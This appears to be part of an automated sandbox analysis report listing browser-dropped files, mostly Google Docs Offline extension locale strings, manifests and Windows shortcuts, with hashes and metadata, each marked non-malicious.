                                                                                                                                                                                                                                                                                                                                                        SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                                                                        SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):843
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                                                                        MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                                                                        SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                                                                        SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):912
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                                                                        MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                                                                        SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                                                                        SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):11280
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.752941882424501
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvVpfcNLFev:m8IEI4u8ROxev
                                                                                                                                                                                                                                                                                                                                                        MD5:F897300492E3AB467E56883D23D02D77
                                                                                                                                                                                                                                                                                                                                                        SHA1:DECD6DC9E70ECCF9B45983147680614C019B99EA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F9B3A5747DEDCB5AED58FCFC0F4FD3BD2F2E903F2CCEF90A92A73DBC0F8C3DBD
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B8AC574E24814BAF04A264E7F3F00B4285CD7B66104DFC77897440A898FCA5230775300EC7DEF723678975A04C2CD1BC73A44F77DA26262E8704029930990C62
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):854
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                                                                        MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                                                                        SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                                                                        SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2525
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.417781191647272
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1H9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APHgiVb
                                                                                                                                                                                                                                                                                                                                                        MD5:35068E2550395A8A3E74558F2F4658DA
                                                                                                                                                                                                                                                                                                                                                        SHA1:BD6620054059BFB7A27A4FFF86B9966727F2C2B9
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E2F418C816895E830541F48C0406B9398805E88B61A4EC816244154CD793743C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:4BCB971D7353648ABF25ACA7A4A4771F62BBB76F8FC13BDE886F29826D9314F5101942492004FC719493604D317958B63A95CF5173F8180214F27D6BEA303F97
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):97
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                                                                        MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                                                                        SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3700)
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):95606
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.405749379350638
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:rFTnpa+88KmEfryTdXPVy0d8RZZ0Qk4CWbsnf29Gmyj9tIRRduRnCrl:almPXPVCFCWbsnDVQRwF0l
                                                                                                                                                                                                                                                                                                                                                        MD5:9D0EF4F7CB0306DCB7A7CDCD6DC2CCC7
                                                                                                                                                                                                                                                                                                                                                        SHA1:88D7F0A88C5807BFE00F13B612CC0522EEBE514A
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E5E4392B21A21ECAFD27707BF70F95961B2656735A20B40BA54479D40EAB063C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:34CD9AF9199DE606A531E98DB82BEAA5552E59BCCB2AB2BF49F82D6FA05425EB6936BC5F03BFC421AB6980B91395D9FDC5F0776882E1D49B3217CD35641FF906
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):291
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                                                                        MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                                                                        SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                                                                        SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3705)
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):104595
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.385879258644142
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:CvBfoqPByzpq7Wj3X5GtH2n4JvHDxwKMpFs0vuFfkR/2oTnHu96Iny0Kj2ThzfS:BlXQtoZrs0vskDTHu9rhTS
                                                                                                                                                                                                                                                                                                                                                        MD5:4E0C47897BF98DEAC56F800942E150C4
                                                                                                                                                                                                                                                                                                                                                        SHA1:7903D30E0ACEE273724BDAA67446D9FD4E8460A5
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FE76EA0C2F81E6140F38F4143B40BE85014B93FF80737600CFB39AEB5C8C6537
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8B31463FC683439BAB5D4AEFE2BE0F6A9F5B695C2D95AFF3F842BFC74B10AE3D386D288121161506F74A08FB86D25C1096DA4177B768254BF84E83983982640F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):135771
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.802585890890899
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
                                                                                                                                                                                                                                                                                                                                                        MD5:DA75BB05D10ACC967EECAAC040D3D733
                                                                                                                                                                                                                                                                                                                                                        SHA1:95C08E067DF713AF8992DB113F7E9AEC84F17181
                                                                                                                                                                                                                                                                                                                                                        SHA-256:33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
                                                                                                                                                                                                                                                                                                                                                        SHA-512:56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1753
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                                                        MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                                                        SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                                                        SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                                                        SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):9815
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                                                        MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                                                        SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                                                        SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):10388
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                                                        MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                                                        SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                                                        SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):962
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                                                        MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                                                                        SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 13:26:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2677
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.9706953632313344
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8pd3TvjbH7idAKZdA19ehwiZUklqehry+3:8rXpky
                                                                                                                                                                                                                                                                                                                                                        MD5:3150DD92D02311F72B5C6B0B0E879B48
                                                                                                                                                                                                                                                                                                                                                        SHA1:DBA47DA3ACF274AA4F0DEA87D57F0A7A2815F26F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:353F0BA9FAF98B60BEF9863976053681F7D2AFA125575EC378BCAF3C09C79C44
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F04BD25B7B9436DEED7B0E41BCF22F7E6F63D0560912022D6C6C1DCA9390220CA9B0CCDD09646DC9092D65A0275D6849A66E51D9557F1A8DE5EA4E4FE7FE57B6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 13:26:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2679
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.9867823287416906
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8Dd3TvjbH7idAKZdA1weh/iZUkAQkqehUy+2:89X79Qpy
                                                                                                                                                                                                                                                                                                                                                        MD5:1AB8A390B96A2265D9D003F5174E85FF
                                                                                                                                                                                                                                                                                                                                                        SHA1:D47F29FC1539BCD55312119E85F8A7372FD8ED05
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B0C8D1DF0703B9BF6283EA5C825FFE61B45271FE9358B1675359211F3150752B
                                                                                                                                                                                                                                                                                                                                                        SHA-512:10DFE7745532C0D85D1B5351DEF42FC6BA6E48309784E702836541DA32B14B37EDEC2D776DDC129E632EB13AAA189503EC8B8BD6CFCFA18BE4F88C8E19CF4D11
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2693
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.000053578817221
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
